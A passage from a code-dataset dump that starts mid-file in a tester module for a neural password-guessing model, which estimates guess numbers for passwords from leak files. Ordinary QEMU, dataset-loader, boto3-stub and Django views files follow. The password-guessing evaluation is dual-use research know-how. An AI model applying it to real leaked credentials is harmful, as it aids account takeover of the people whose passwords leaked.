**plot_kargs)\n\n ax.set_xscale('log')\n\n if x_lim is None:\n x_lim = x[-1]\n else:\n x_lim = max((x[-1], x_lim))\n\n margin = .04\n yticks = np.linspace(0, 1, 11)\n yticklabels = [f'{int(i*100)}%' for i in yticks]\n ax.set(\n xlabel=\"Number of Guesses (log)\",\n ylabel=\"Guessed Passwords\",\n ylim=(0, 1 + margin),\n xlim=(guesses_limit[0], x_lim),\n yticks=yticks,\n yticklabels=yticklabels,\n );\n\n ax.legend()\n return ax, x_lim\n\n\nclass Tester:\n \"\"\" Assign guess numbers and/or probabilities to passwords using Monte Carlo est. \"\"\"\n \n def __init__(\n self,\n encoder,\n decoder,\n input_fn,\n hparams,\n theta_file=None,\n log_probability=False\n ):\n \n self.encoder, self.decoder = encoder, decoder\n self.conditional = not self.encoder is None\n \n self.hparams = hparams.copy()\n self.thparams = hparams['testing']\n self.input_fn = input_fn\n \n if \"sample_size\" in self.thparams:\n sample_size = self.thparams[\"sample_size\"]\n self.hparams[\"sample_size\"] = sample_size\n\n self.log_probability = log_probability\n \n if theta_file is None:\n self.p_theta = None\n else:\n self.p_theta = np.load(theta_file)\n \n @staticmethod\n def _guess_number(P, theta_P, epsilon=0):\n \"\"\" REMEMBER: move to -log p\"\"\"\n\n def gnmc(pt, theta_P):\n i = np.searchsorted(theta_P, pt)\n gn = ( 1 / (theta_P[i:] * len(theta_P) + epsilon) ).sum()\n return gn\n\n n = len(P)\n G = np.zeros(n)\n for i in range(n):\n G[i] = gnmc(P[i], theta_P)\n\n return G\n \n \n def compute_seed(self, path):\n # get dataset for configuration seed\n ds_sample_for_seed = read_and_parse_single_leak(path, self.hparams, True, shuffle=True)\n \n # compute seed from partial sample\n _data_for_seed = ds_sample_for_seed.get_single_element() \n data_for_seed = self.input_fn(_data_for_seed)\n \n print(\"Actual number of users sampled for SEED computation: \", data_for_seed[0].shape[0], \"\\n\")\n \n inputs = list(data_for_seed[2:])\n \n seed = self.encoder(inputs, training=False)\n \n return seed\n \n \n def compute_probability_from_file(self, path, return_X=False):\n \n # get dataset to test\n ds_full = read_and_parse_single_leak(path, self.hparams, False, shuffle=False)\n ds_full = ds_full.apply(\n tf.data.experimental.dense_to_ragged_batch(self.thparams['decoder_batch_size'])\n )\n \n if self.conditional:\n # compute seed \n seed = self.compute_seed(path)\n else:\n seed = None\n pub_encoded = None\n\n return self.compute_probability(\n seed,\n ds_full,\n return_X=return_X\n ), seed\n \n \n def compute_probability(self, seed, ds_full, return_X=False):\n \n P = []\n \n if return_X:\n X = []\n \n for _batch in ds_full:\n \n batch = self.input_fn(_batch)\n x, y, *_ = batch\n \n if self.conditional:\n seeds = tf.tile(seed, (x.shape[0], 1, 1))\n logits, *_ = self.decoder((x, seeds), training=False)\n else: \n logits, _ = self.decoder(x, training=False)\n\n _P = get_probability(y, logits, log_probability=self.log_probability)\n P.append(_P.numpy())\n\n if return_X:\n X += [s.decode() for s in _batch['password'].numpy()]\n \n P = np.concatenate(P)\n \n if return_X:\n return X, P\n else:\n return P\n \n \n def compute_and_save_theta_for_mc(self, seed):\n print(f\"Sampling theta for Monte Carlo guess number estimation (it might take a while....) Theta size is {self.thparams['theta_size']}\")\n _, p_theta = ancestral_sampling(\n self.thparams['theta_size'],\n self.decoder,\n self.thparams['decoder_batch_size'],\n self.hparams,\n seed=seed,\n with_string=False\n )\n p_theta.sort()\n return p_theta\n \n \n def compute_guess_numbers_from_file(self, path):\n\n (X, P), seed = self.compute_probability_from_file(path, return_X=True)\n\n if self.p_theta is None:\n print(\"No precomputed theta.\")\n self.p_theta = self.compute_and_save_theta_for_mc(seed)\n\n G = self._guess_number(P, self.p_theta)\n\n return X, G, P, seed","repo_name":"TheAdamProject/UniversalNeuralCrackingMachines","sub_path":"tester.py","file_name":"tester.py","file_ext":"py","file_size_in_byte":5957,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"81"} +{"seq_id":"72642973066","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n\"\"\"\nCommand-line wrapper for the tracetool machinery.\n\"\"\"\n\n__author__ = \"Lluís Vilanova <vilanova@ac.upc.edu>\"\n__copyright__ = \"Copyright 2012-2014, Lluís Vilanova <vilanova@ac.upc.edu>\"\n__license__ = \"GPL version 2 or (at your option) any later version\"\n\n__maintainer__ = \"Stefan Hajnoczi\"\n__email__ = \"stefanha@redhat.com\"\n\n\nimport sys\nimport getopt\n\nfrom tracetool import error_write, out, out_open\nimport tracetool.backend\nimport tracetool.format\n\n\n_SCRIPT = \"\"\n\ndef error_opt(msg = None):\n if msg is not None:\n error_write(\"Error: \" + msg + \"\\n\")\n\n backend_descr = \"\\n\".join([ \" %-15s %s\" % (n, d)\n for n,d in tracetool.backend.get_list() ])\n format_descr = \"\\n\".join([ \" %-15s %s\" % (n, d)\n for n,d in tracetool.format.get_list() ])\n error_write(\"\"\"\\\nUsage: %(script)s --format=<format> --backends=<backends> [<options>] <trace-events> ... <output>\n\nBackends:\n%(backends)s\n\nFormats:\n%(formats)s\n\nOptions:\n --help This help message.\n --list-backends Print list of available backends.\n --check-backends Check if the given backend is valid.\n --binary <path> Full path to QEMU binary.\n --target-type <type> QEMU emulator target type ('system' or 'user').\n --target-name <name> QEMU emulator target name.\n --group <name> Name of the event group\n --probe-prefix <prefix> Prefix for dtrace probe names\n (default: qemu-<target-type>-<target-name>).\\\n\"\"\" % {\n \"script\" : _SCRIPT,\n \"backends\" : backend_descr,\n \"formats\" : format_descr,\n })\n\n if msg is None:\n sys.exit(0)\n else:\n sys.exit(1)\n\ndef main(args):\n global _SCRIPT\n _SCRIPT = args[0]\n\n long_opts = [\"backends=\", \"format=\", \"help\", \"list-backends\",\n \"check-backends\", \"group=\"]\n long_opts += [\"binary=\", \"target-type=\", \"target-name=\", \"probe-prefix=\"]\n\n try:\n opts, args = getopt.getopt(args[1:], \"\", long_opts)\n except getopt.GetoptError as err:\n error_opt(str(err))\n\n check_backends = False\n arg_backends = []\n arg_format = \"\"\n arg_group = None\n binary = None\n target_type = None\n target_name = None\n probe_prefix = None\n for opt, arg in opts:\n if opt == \"--help\":\n error_opt()\n\n elif opt == \"--backends\":\n arg_backends = arg.split(\",\")\n elif opt == \"--group\":\n arg_group = arg\n elif opt == \"--format\":\n arg_format = arg\n\n elif opt == \"--list-backends\":\n public_backends = tracetool.backend.get_list(only_public = True)\n out(\", \".join([ b for b,_ in public_backends ]))\n sys.exit(0)\n elif opt == \"--check-backends\":\n check_backends = True\n\n elif opt == \"--binary\":\n binary = arg\n elif opt == '--target-type':\n target_type = arg\n elif opt == '--target-name':\n target_name = arg\n elif opt == '--probe-prefix':\n probe_prefix = arg\n\n else:\n error_opt(\"unhandled option: %s\" % opt)\n\n if len(arg_backends) == 0:\n error_opt(\"no backends specified\")\n\n if check_backends:\n for backend in arg_backends:\n if not tracetool.backend.exists(backend):\n sys.exit(1)\n sys.exit(0)\n\n if arg_group is None:\n error_opt(\"group name is required\")\n\n if arg_format == \"stap\":\n if binary is None:\n error_opt(\"--binary is required for SystemTAP tapset generator\")\n if probe_prefix is None and target_type is None:\n error_opt(\"--target-type is required for SystemTAP tapset generator\")\n if probe_prefix is None and target_name is None:\n error_opt(\"--target-name is required for SystemTAP tapset generator\")\n\n if probe_prefix is None:\n probe_prefix = \".\".join([\"qemu\", target_type, target_name])\n\n if len(args) < 2:\n error_opt(\"missing trace-events and output filepaths\")\n events = []\n for arg in args[:-1]:\n with open(arg, \"r\") as fh:\n events.extend(tracetool.read_events(fh, arg))\n\n out_open(args[-1])\n\n try:\n tracetool.generate(events, arg_group, arg_format, arg_backends,\n binary=binary, probe_prefix=probe_prefix)\n except tracetool.TracetoolError as e:\n error_opt(str(e))\n\nif __name__ == \"__main__\":\n main(sys.argv)\n","repo_name":"qemu/qemu","sub_path":"scripts/tracetool.py","file_name":"tracetool.py","file_ext":"py","file_size_in_byte":4596,"program_lang":"python","lang":"en","doc_type":"code","stars":8597,"dataset":"github-code","pt":"81"} +{"seq_id":"31238668122","text":"import os\n\nfrom engine.datasets.benchmark import read_and_split_data, read_split, Benchmark\n\n\nclass DescribableTextures(Benchmark):\n\n dataset_name = \"dtd\"\n\n def __init__(self, data_dir):\n root = data_dir\n self.dataset_dir = os.path.join(root, self.dataset_name)\n self.image_dir = os.path.join(self.dataset_dir, \"images\")\n self.split_path = os.path.join(self.dataset_dir, \"split_zhou_DescribableTextures.json\")\n \n assert os.path.exists(self.split_path)\n train, val, test = read_split(self.split_path, self.image_dir)\n # # Uncomment the following lines to generate a new split\n # train, val, test = read_and_split_data(self.image_dir)\n # save_split(train, val, test, self.split_path, self.image_dir)\n\n super().__init__(train=train, val=val, test=test)","repo_name":"linzhiqiu/cross_modal_adaptation","sub_path":"engine/datasets/dtd.py","file_name":"dtd.py","file_ext":"py","file_size_in_byte":832,"program_lang":"python","lang":"en","doc_type":"code","stars":188,"dataset":"github-code","pt":"81"} +{"seq_id":"10326917559","text":"\"\"\"\nType annotations for translate service client.\n\n[Open documentation](https://vemel.github.io/boto3_stubs_docs/mypy_boto3_translate/client.html)\n\nUsage::\n\n ```python\n import boto3\n from mypy_boto3_translate import TranslateClient\n\n client: TranslateClient = boto3.client(\"translate\")\n ```\n\"\"\"\nimport sys\nfrom typing import Any, Dict, List, Type\n\nfrom botocore.client import BaseClient, ClientMeta\n\nfrom .literals import DisplayLanguageCodeType, TerminologyDataFormatType\nfrom .paginator import ListTerminologiesPaginator\nfrom .type_defs import (\n CreateParallelDataResponseTypeDef,\n DeleteParallelDataResponseTypeDef,\n DescribeTextTranslationJobResponseTypeDef,\n EncryptionKeyTypeDef,\n GetParallelDataResponseTypeDef,\n GetTerminologyResponseTypeDef,\n ImportTerminologyResponseTypeDef,\n InputDataConfigTypeDef,\n ListLanguagesResponseTypeDef,\n ListParallelDataResponseTypeDef,\n ListTagsForResourceResponseTypeDef,\n ListTerminologiesResponseTypeDef,\n ListTextTranslationJobsResponseTypeDef,\n OutputDataConfigTypeDef,\n ParallelDataConfigTypeDef,\n StartTextTranslationJobResponseTypeDef,\n StopTextTranslationJobResponseTypeDef,\n TagTypeDef,\n TerminologyDataTypeDef,\n TextTranslationJobFilterTypeDef,\n TranslateTextResponseTypeDef,\n TranslationSettingsTypeDef,\n UpdateParallelDataResponseTypeDef,\n)\n\nif sys.version_info >= (3, 8):\n from typing import Literal\nelse:\n from typing_extensions import Literal\n\n__all__ = (\"TranslateClient\",)\n\nclass BotocoreClientError(BaseException):\n MSG_TEMPLATE: str\n\n def __init__(self, error_response: Dict[str, Any], operation_name: str) -> None:\n self.response: Dict[str, Any]\n self.operation_name: str\n\nclass Exceptions:\n ClientError: Type[BotocoreClientError]\n ConcurrentModificationException: Type[BotocoreClientError]\n ConflictException: Type[BotocoreClientError]\n DetectedLanguageLowConfidenceException: Type[BotocoreClientError]\n InternalServerException: Type[BotocoreClientError]\n InvalidFilterException: Type[BotocoreClientError]\n InvalidParameterValueException: Type[BotocoreClientError]\n InvalidRequestException: Type[BotocoreClientError]\n LimitExceededException: Type[BotocoreClientError]\n ResourceNotFoundException: Type[BotocoreClientError]\n ServiceUnavailableException: Type[BotocoreClientError]\n TextSizeLimitExceededException: Type[BotocoreClientError]\n TooManyRequestsException: Type[BotocoreClientError]\n TooManyTagsException: Type[BotocoreClientError]\n UnsupportedDisplayLanguageCodeException: Type[BotocoreClientError]\n UnsupportedLanguagePairException: Type[BotocoreClientError]\n\nclass TranslateClient(BaseClient):\n \"\"\"\n [Show boto3 documentation](https://boto3.amazonaws.com/v1/documentation/api/1.26.121/reference/services/translate.html#Translate.Client)\n [Show boto3-stubs documentation](https://vemel.github.io/boto3_stubs_docs/mypy_boto3_translate/client.html)\n \"\"\"\n\n meta: ClientMeta\n\n @property\n def exceptions(self) -> Exceptions:\n \"\"\"\n TranslateClient exceptions.\n \"\"\"\n def can_paginate(self, operation_name: str) -> bool:\n \"\"\"\n Check if an operation can be paginated.\n\n [Show boto3 documentation](https://boto3.amazonaws.com/v1/documentation/api/1.26.121/reference/services/translate.html#Translate.Client.can_paginate)\n [Show boto3-stubs documentation](https://vemel.github.io/boto3_stubs_docs/mypy_boto3_translate/client.html#can_paginate)\n \"\"\"\n def close(self) -> None:\n \"\"\"\n Closes underlying endpoint connections.\n\n [Show boto3 documentation](https://boto3.amazonaws.com/v1/documentation/api/1.26.121/reference/services/translate.html#Translate.Client.close)\n [Show boto3-stubs documentation](https://vemel.github.io/boto3_stubs_docs/mypy_boto3_translate/client.html#close)\n \"\"\"\n def create_parallel_data(\n self,\n *,\n Name: str,\n ParallelDataConfig: \"ParallelDataConfigTypeDef\",\n ClientToken: str,\n Description: str = None,\n EncryptionKey: \"EncryptionKeyTypeDef\" = None,\n Tags: List[\"TagTypeDef\"] = None\n ) -> CreateParallelDataResponseTypeDef:\n \"\"\"\n Creates a parallel data resource in Amazon Translate by importing an input file\n from Amazon S3.\n\n [Show boto3 documentation](https://boto3.amazonaws.com/v1/documentation/api/1.26.121/reference/services/translate.html#Translate.Client.create_parallel_data)\n [Show boto3-stubs documentation](https://vemel.github.io/boto3_stubs_docs/mypy_boto3_translate/client.html#create_parallel_data)\n \"\"\"\n def delete_parallel_data(self, *, Name: str) -> DeleteParallelDataResponseTypeDef:\n \"\"\"\n Deletes a parallel data resource in Amazon Translate.\n\n [Show boto3 documentation](https://boto3.amazonaws.com/v1/documentation/api/1.26.121/reference/services/translate.html#Translate.Client.delete_parallel_data)\n [Show boto3-stubs documentation](https://vemel.github.io/boto3_stubs_docs/mypy_boto3_translate/client.html#delete_parallel_data)\n \"\"\"\n def delete_terminology(self, *, Name: str) -> None:\n \"\"\"\n A synchronous action that deletes a custom terminology.\n\n [Show boto3 documentation](https://boto3.amazonaws.com/v1/documentation/api/1.26.121/reference/services/translate.html#Translate.Client.delete_terminology)\n [Show boto3-stubs documentation](https://vemel.github.io/boto3_stubs_docs/mypy_boto3_translate/client.html#delete_terminology)\n \"\"\"\n def describe_text_translation_job(\n self, *, JobId: str\n ) -> DescribeTextTranslationJobResponseTypeDef:\n \"\"\"\n Gets the properties associated with an asynchronous batch translation job\n including name, ID, status, source and target languages, input/output S3\n buckets, and so on.\n\n [Show boto3 documentation](https://boto3.amazonaws.com/v1/documentation/api/1.26.121/reference/services/translate.html#Translate.Client.describe_text_translation_job)\n [Show boto3-stubs documentation](https://vemel.github.io/boto3_stubs_docs/mypy_boto3_translate/client.html#describe_text_translation_job)\n \"\"\"\n def generate_presigned_url(\n self,\n ClientMethod: str,\n Params: Dict[str, Any] = None,\n ExpiresIn: int = 3600,\n HttpMethod: str = None,\n ) -> str:\n \"\"\"\n Generate a presigned url given a client, its method, and arguments.\n\n [Show boto3 documentation](https://boto3.amazonaws.com/v1/documentation/api/1.26.121/reference/services/translate.html#Translate.Client.generate_presigned_url)\n [Show boto3-stubs documentation](https://vemel.github.io/boto3_stubs_docs/mypy_boto3_translate/client.html#generate_presigned_url)\n \"\"\"\n def get_parallel_data(self, *, Name: str) -> GetParallelDataResponseTypeDef:\n \"\"\"\n Provides information about a parallel data resource.\n\n [Show boto3 documentation](https://boto3.amazonaws.com/v1/documentation/api/1.26.121/reference/services/translate.html#Translate.Client.get_parallel_data)\n [Show boto3-stubs documentation](https://vemel.github.io/boto3_stubs_docs/mypy_boto3_translate/client.html#get_parallel_data)\n \"\"\"\n def get_terminology(\n self, *, Name: str, TerminologyDataFormat: TerminologyDataFormatType = None\n ) -> GetTerminologyResponseTypeDef:\n \"\"\"\n Retrieves a custom terminology.\n\n [Show boto3 documentation](https://boto3.amazonaws.com/v1/documentation/api/1.26.121/reference/services/translate.html#Translate.Client.get_terminology)\n [Show boto3-stubs documentation](https://vemel.github.io/boto3_stubs_docs/mypy_boto3_translate/client.html#get_terminology)\n \"\"\"\n def import_terminology(\n self,\n *,\n Name: str,\n MergeStrategy: Literal[\"OVERWRITE\"],\n TerminologyData: \"TerminologyDataTypeDef\",\n Description: str = None,\n EncryptionKey: \"EncryptionKeyTypeDef\" = None,\n Tags: List[\"TagTypeDef\"] = None\n ) -> ImportTerminologyResponseTypeDef:\n \"\"\"\n Creates or updates a custom terminology, depending on whether one already exists\n for the given terminology name.\n\n [Show boto3 documentation](https://boto3.amazonaws.com/v1/documentation/api/1.26.121/reference/services/translate.html#Translate.Client.import_terminology)\n [Show boto3-stubs documentation](https://vemel.github.io/boto3_stubs_docs/mypy_boto3_translate/client.html#import_terminology)\n \"\"\"\n def list_languages(\n self,\n *,\n DisplayLanguageCode: DisplayLanguageCodeType = None,\n NextToken: str = None,\n MaxResults: int = None\n ) -> ListLanguagesResponseTypeDef:\n \"\"\"\n Provides a list of languages (RFC-5646 codes and names) that Amazon Translate\n supports.\n\n [Show boto3 documentation](https://boto3.amazonaws.com/v1/documentation/api/1.26.121/reference/services/translate.html#Translate.Client.list_languages)\n [Show boto3-stubs documentation](https://vemel.github.io/boto3_stubs_docs/mypy_boto3_translate/client.html#list_languages)\n \"\"\"\n def list_parallel_data(\n self, *, NextToken: str = None, MaxResults: int = None\n ) -> ListParallelDataResponseTypeDef:\n \"\"\"\n Provides a list of your parallel data resources in Amazon Translate.\n\n [Show boto3 documentation](https://boto3.amazonaws.com/v1/documentation/api/1.26.121/reference/services/translate.html#Translate.Client.list_parallel_data)\n [Show boto3-stubs documentation](https://vemel.github.io/boto3_stubs_docs/mypy_boto3_translate/client.html#list_parallel_data)\n \"\"\"\n def list_tags_for_resource(self, *, ResourceArn: str) -> ListTagsForResourceResponseTypeDef:\n \"\"\"\n Lists all tags associated with a given Amazon Translate resource.\n\n [Show boto3 documentation](https://boto3.amazonaws.com/v1/documentation/api/1.26.121/reference/services/translate.html#Translate.Client.list_tags_for_resource)\n [Show boto3-stubs documentation](https://vemel.github.io/boto3_stubs_docs/mypy_boto3_translate/client.html#list_tags_for_resource)\n \"\"\"\n def list_terminologies(\n self, *, NextToken: str = None, MaxResults: int = None\n ) -> ListTerminologiesResponseTypeDef:\n \"\"\"\n Provides a list of custom terminologies associated with your account.\n\n [Show boto3 documentation](https://boto3.amazonaws.com/v1/documentation/api/1.26.121/reference/services/translate.html#Translate.Client.list_terminologies)\n [Show boto3-stubs documentation](https://vemel.github.io/boto3_stubs_docs/mypy_boto3_translate/client.html#list_terminologies)\n \"\"\"\n def list_text_translation_jobs(\n self,\n *,\n Filter: \"TextTranslationJobFilterTypeDef\" = None,\n NextToken: str = None,\n MaxResults: int = None\n ) -> ListTextTranslationJobsResponseTypeDef:\n \"\"\"\n Gets a list of the batch translation jobs that you have submitted.\n\n [Show boto3 documentation](https://boto3.amazonaws.com/v1/documentation/api/1.26.121/reference/services/translate.html#Translate.Client.list_text_translation_jobs)\n [Show boto3-stubs documentation](https://vemel.github.io/boto3_stubs_docs/mypy_boto3_translate/client.html#list_text_translation_jobs)\n \"\"\"\n def start_text_translation_job(\n self,\n *,\n InputDataConfig: \"InputDataConfigTypeDef\",\n OutputDataConfig: \"OutputDataConfigTypeDef\",\n DataAccessRoleArn: str,\n SourceLanguageCode: str,\n TargetLanguageCodes: List[str],\n ClientToken: str,\n JobName: str = None,\n TerminologyNames: List[str] = None,\n ParallelDataNames: List[str] = None,\n Settings: \"TranslationSettingsTypeDef\" = None\n ) -> StartTextTranslationJobResponseTypeDef:\n \"\"\"\n Starts an asynchronous batch translation job.\n\n [Show boto3 documentation](https://boto3.amazonaws.com/v1/documentation/api/1.26.121/reference/services/translate.html#Translate.Client.start_text_translation_job)\n [Show boto3-stubs documentation](https://vemel.github.io/boto3_stubs_docs/mypy_boto3_translate/client.html#start_text_translation_job)\n \"\"\"\n def stop_text_translation_job(self, *, JobId: str) -> StopTextTranslationJobResponseTypeDef:\n \"\"\"\n Stops an asynchronous batch translation job that is in progress.\n\n [Show boto3 documentation](https://boto3.amazonaws.com/v1/documentation/api/1.26.121/reference/services/translate.html#Translate.Client.stop_text_translation_job)\n [Show boto3-stubs documentation](https://vemel.github.io/boto3_stubs_docs/mypy_boto3_translate/client.html#stop_text_translation_job)\n \"\"\"\n def tag_resource(self, *, ResourceArn: str, Tags: List[\"TagTypeDef\"]) -> Dict[str, Any]:\n \"\"\"\n Associates a specific tag with a resource.\n\n [Show boto3 documentation](https://boto3.amazonaws.com/v1/documentation/api/1.26.121/reference/services/translate.html#Translate.Client.tag_resource)\n [Show boto3-stubs documentation](https://vemel.github.io/boto3_stubs_docs/mypy_boto3_translate/client.html#tag_resource)\n \"\"\"\n def translate_text(\n self,\n *,\n Text: str,\n SourceLanguageCode: str,\n TargetLanguageCode: str,\n TerminologyNames: List[str] = None,\n Settings: \"TranslationSettingsTypeDef\" = None\n ) -> TranslateTextResponseTypeDef:\n \"\"\"\n Translates input text from the source language to the target language.\n\n [Show boto3 documentation](https://boto3.amazonaws.com/v1/documentation/api/1.26.121/reference/services/translate.html#Translate.Client.translate_text)\n [Show boto3-stubs documentation](https://vemel.github.io/boto3_stubs_docs/mypy_boto3_translate/client.html#translate_text)\n \"\"\"\n def untag_resource(self, *, ResourceArn: str, TagKeys: List[str]) -> Dict[str, Any]:\n \"\"\"\n Removes a specific tag associated with an Amazon Translate resource.\n\n [Show boto3 documentation](https://boto3.amazonaws.com/v1/documentation/api/1.26.121/reference/services/translate.html#Translate.Client.untag_resource)\n [Show boto3-stubs documentation](https://vemel.github.io/boto3_stubs_docs/mypy_boto3_translate/client.html#untag_resource)\n \"\"\"\n def update_parallel_data(\n self,\n *,\n Name: str,\n ParallelDataConfig: \"ParallelDataConfigTypeDef\",\n ClientToken: str,\n Description: str = None\n ) -> UpdateParallelDataResponseTypeDef:\n \"\"\"\n Updates a previously created parallel data resource by importing a new input\n file from Amazon S3.\n\n [Show boto3 documentation](https://boto3.amazonaws.com/v1/documentation/api/1.26.121/reference/services/translate.html#Translate.Client.update_parallel_data)\n [Show boto3-stubs documentation](https://vemel.github.io/boto3_stubs_docs/mypy_boto3_translate/client.html#update_parallel_data)\n \"\"\"\n def get_paginator(\n self, operation_name: Literal[\"list_terminologies\"]\n ) -> ListTerminologiesPaginator:\n \"\"\"\n [Show boto3 documentation](https://boto3.amazonaws.com/v1/documentation/api/1.26.121/reference/services/translate.html#Translate.Paginator.ListTerminologies)\n [Show boto3-stubs documentation](https://vemel.github.io/boto3_stubs_docs/mypy_boto3_translate/paginators.html#listterminologiespaginator)\n \"\"\"\n","repo_name":"chrishollinworth/vscode-boto3-intellisense","sub_path":"typings/mypy_boto3/translate/client.pyi","file_name":"client.pyi","file_ext":"pyi","file_size_in_byte":15632,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"27488305265","text":"from . import forms\nfrom .forms import ProductForm, ClientForm, LivraisonForm, TransporteurForm , Niveau1Form, Niveau2Form, Niveau3Form, Niveau4Form, Niveau5Form\nfrom django.shortcuts import redirect, render, get_object_or_404\nfrom django.contrib.auth.decorators import login_required, permission_required\nfrom django.views.decorators.cache import cache_control \nfrom django.contrib import messages\nfrom django.http import HttpResponseRedirect, HttpResponse, FileResponse, JsonResponse\nfrom django.core.paginator import Paginator\nfrom django.db.models import Count, Sum\nfrom stock.models import *\nfrom escpos.printer import Usb\nfrom django.db import transaction, models\nfrom django.utils import timezone\nimport uuid\nimport csv\nimport openpyxl\nimport datetime\nfrom datetime import date\nfrom django.views.generic import View\n\n\n\n\n\n@login_required\n@cache_control(no_cache=True, must_revalidate=True, no_store=True)\ndef index(request):\n #recupérez les date selectionnées depuis le template\n date_depart = request.GET.get('date_depart')\n date_arrive = request.GET.get('date_arrive')\n #Verifie si les dates ont été bien récupéré\n if date_depart and date_arrive:\n #on fait le filtre\n etats1 = Commande.objects.filter(date_commande__range=[date_depart, date_arrive]).values('client__rasion_sociale').annotate(total=Count('client'))\n etats = LigneCommande.objects.filter(commande__in=Commande.objects.all(), commande__date_commande__range=[date_depart, date_arrive]).values('article__code').annotate(total=Count('article'), quantite=Sum('quantite'))\n else:\n # si non retourne les éléments sans filtre\n etats1 = Commande.objects.all().values('client__rasion_sociale').annotate(total=Count('client'))\n etats = LigneCommande.objects.filter(commande__in=Commande.objects.all()).values('article__code').annotate(total=Count('article'), quantite=Sum('quantite'))\n # on compte le nombre de ligne retournées pour dynamiser le graphique\n barres = etats.count()\n barres1 = etats1.count()\n # on selectionne et on compte le nombre de produit disponible dans la base\n articles = Product.objects.all().count()\n # on selectionne et on compte le nombre de commande passées disponible dans la base\n articles_commandes = Commande.objects.all().count()\n # on selectionne et on compte le nombre de commande livré disponible dans la base\n articles_livres = Livraison.objects.filter(livre=True).count()\n context={\"date_depart\":date_depart, \"date_arrive\":date_arrive, \"barres1\":barres1, \"etats1\":etats1, \"barres\":barres, \"etats\":etats, \"articles\":articles, \"articles_commandes\":articles_commandes, \"articles_livres\":articles_livres}\n # on reinitialise le filtre\n if 'reset' in request.GET:\n return redirect('index')\n return render(request, 'stock/index.html', context)\n\n\n\n@login_required\n@permission_required('stock.view_client')\n@cache_control(no_cache=True, must_revalidate=True, no_store=True)\ndef client(request):\n clients = Client.objects.all().order_by('-id')\n paginator = Paginator(clients, 10)\n page_number = request.GET.get('page')\n page_obj = paginator.get_page(page_number)\n context={\"page_obj\":page_obj}\n return render(request, 'stock/client.html', context) \n\n\n@login_required\n@permission_required('stock.add_client', login_url='acces_denied')\n@cache_control(no_cache=True, must_revalidate=True, no_store=True)\ndef add_client(request):\n if request.method == 'POST':\n form = ClientForm(request.POST)\n if form.is_valid():\n form.save()\n cont_type1 = form.cleaned_data.get('rasion_sociale')\n cont_type2 = form.cleaned_data.get('rasion_sociale')\n messages.success(request, f\"{cont_type1}, {cont_type2} ajouté avec succès!\")\n return HttpResponseRedirect('client')\n else:\n messages.error(request, \"Veuillez verifiez svpla saisie!\")\n return render(request, 'stock/add_client.html', {'form':form})\n else:\n form = ClientForm()\n return render(request, 'stock/add_client.html', {'form':form})\n\n\n@login_required\n@permission_required('stock.change_client', login_url='acces_denied')\n@cache_control(no_cache=True, must_revalidate=True, no_store=True)\ndef edit_client(request, id):\n client = Client.objects.get(id=id)\n if request.method == 'POST':\n form = ClientForm(request.POST,request.FILES, instance=client)\n if form.is_valid():\n form.save(id)\n messages.success(request, f\"Mise à jour {client.rasion_sociale} ok !\")\n return redirect('client')\n else:\n form = ClientForm(instance=client)\n return render(request, 'stock/edit_client.html', {'form':form, \"client\":client})\n\n\n\n@login_required\n@permission_required('stock.delete_client', login_url='acces_denied')\n@cache_control(no_cache=True, must_revalidate=True, no_store=True)\ndef delete_client(request, id):\n client = Client.objects.get(id=id)\n if request.method=='POST':\n client.delete()\n messages.success(request, f'{client.rasion_sociale} supprimé !')\n return redirect(\"client\")\n return render(request, 'stock/delete_client.html', {\"client\":client})\n\n@login_required\n@permission_required('stock.view_transporteur')\n@cache_control(no_cache=True, must_revalidate=True, no_store=True)\ndef transport(request):\n transports = Transporteur.objects.all().order_by('-id')\n paginator = Paginator(transports, 10)\n page_number = request.GET.get('page')\n page_obj = paginator.get_page(page_number)\n context={\"page_obj\":page_obj}\n return render(request, 'stock/transport.html', context) \n\n\n\n@login_required\n@permission_required('stock.add_transporteur', login_url='acces_denied')\n@cache_control(no_cache=True, must_revalidate=True, no_store=True)\ndef add_transport(request):\n if request.method == 'POST':\n form = TransporteurForm(request.POST)\n if form.is_valid():\n form.save()\n cont_type1 = form.cleaned_data.get('name_transp')\n messages.success(request, f\"{cont_type1} ajouté avec succès!\")\n return HttpResponseRedirect('transport')\n else:\n messages.error(request, \"Veuillez verifiez svpla saisie!\")\n return render(request, 'stock/add_client.html', {'form':form})\n else:\n form = TransporteurForm()\n return render(request, 'stock/add_transport.html', {'form':form})\n\n\n\n\n@login_required\n@permission_required('stock.change_transporteur', login_url='acces_denied')\n@cache_control(no_cache=True, must_revalidate=True, no_store=True) \ndef edit_transport(request, id):\n transport = Transporteur.objects.get(id=id)\n if request.method == 'POST':\n form = TransporteurForm(request.POST,request.FILES, instance=transport)\n if form.is_valid():\n form.save(id)\n messages.success(request, f\"Mise à jour {transport.name_transp} ok !\")\n return redirect('transport')\n else:\n form = TransporteurForm(instance=transport)\n return render(request, 'stock/edit_transport.html', {'form':form, \"transport\":transport})\n\n\n\n@login_required\n@permission_required('stock.delete_transporteur', login_url='acces_denied')\n@cache_control(no_cache=True, must_revalidate=True, no_store=True)\ndef delete_transport(request, id):\n transport = Transporteur.objects.get(id=id)\n if request.method=='POST':\n transport.delete()\n messages.success(request, f'{transport.name_transp} supprimé !')\n return redirect(\"transport\")\n return render(request, 'stock/delete_transport.html', {\"transport\":transport})\n\n\n\n\n@login_required\n@permission_required('stock.view_niveau1', login_url='acces_denied')\n@cache_control(no_cache=True, must_revalidate=True, no_store=True)\ndef niveau(request):\n return render(request, 'stock/niveau.html')\n\n@login_required\n@permission_required('stock.add_niveau1', login_url='acces_denied')\n@cache_control(no_cache=True, must_revalidate=True, no_store=True)\ndef create_n1(request):\n niveau1 = Niveau1.objects.all()\n if request.method == 'POST':\n form = Niveau1Form(request.POST)\n if form.is_valid():\n form.save()\n cont_type = form.cleaned_data.get('name')\n messages.success(request, f\"{cont_type} ajouté avec succès!\")\n return HttpResponseRedirect('create_n1')\n else:\n messages.error(request, \"Veuillez verifiez svpla saisie!\")\n return render(request, 'stock/create_n1.html', {\"niveau1\":niveau1, 'form':form})\n else:\n form = Niveau1Form()\n return render(request, 'stock/create_n1.html', {\"niveau1\":niveau1, 'form':form})\n\n\n\n@login_required\n@permission_required('stock.change_niveau1', login_url='acces_denied')\n@cache_control(no_cache=True, must_revalidate=True, no_store=True) \ndef edit_n1(request, id):\n niveau = Niveau1.objects.get(id=id)\n if request.method == 'POST':\n form = Niveau1Form(request.POST,request.FILES, 